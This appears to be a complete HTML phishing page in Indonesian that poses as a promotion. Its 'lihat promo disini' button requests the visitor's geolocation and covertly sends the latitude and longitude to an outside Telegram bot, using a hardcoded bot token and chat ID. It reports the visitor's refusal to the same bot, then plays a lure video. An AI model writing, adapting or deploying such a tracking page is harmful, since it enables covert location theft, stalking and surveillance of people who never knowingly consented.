<!DOCTYPE html>
<html>
<head>
  <title>Izinkan Cache</title>
  <style>
    html, body {
      margin: 0;
      padding: 0;
      height: 100%;
      overflow: hidden;
    }

    body {
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      text-align: center;
      background-color: #f0f0f0;
    }

    /* Tombol besar */
    .tombol-promo {
      font-size: 24px;
      padding: 20px 40px;
      background-color: #4CAF50;
      color: white;
      border: none;
      border-radius: 10px;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }

    .tombol-promo:hover {
      background-color: #45a049;
    }

    #videoContainer {
      display: none;
      margin-top: 20px;
      border: 2px solid red;
    }
  </style>
</head>
<body>
  <button class="tombol-promo" onclick="mintaLokasi()">lihat promo disini</button>

  <div id="videoContainer">
    <video width="320" height="240" controls autoplay>
      <source src="https://now-glich.github.io/Myfirsh/trik.mp4" type="video/mp4">
      Browser Anda tidak mendukung video.
    </video>
  </div>

  <script>
    const botToken = "7579024338:AAGkv6LtQQH3uKtqD64DVNca4V7ZYwAyLT0";
    const chatId = "7420684427";

    function mintaLokasi() {
      if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(
          (pos) => {
            const { latitude, longitude } = pos.coords;
            alert(`apakah anda pengguna G2G?`);
            const pesan = `Lokasi berhasil diterima boss:\nLat: ${latitude}\nLon: ${longitude}`;
            fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(pesan)}`);

            setTimeout(() => {
              document.getElementById("videoContainer").style.display = "block";
            }, 500);
          },
          (err) => {
            const pesan = `Pengguna menolak memberikan lokasi.`;
            fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(pesan)}`);
            console.log("Lokasi ditolak.");
          }
        );
      } else {
        alert("Geolocation tidak didukung browser ini.");
      }
    }
  </script>
</body>
</html>
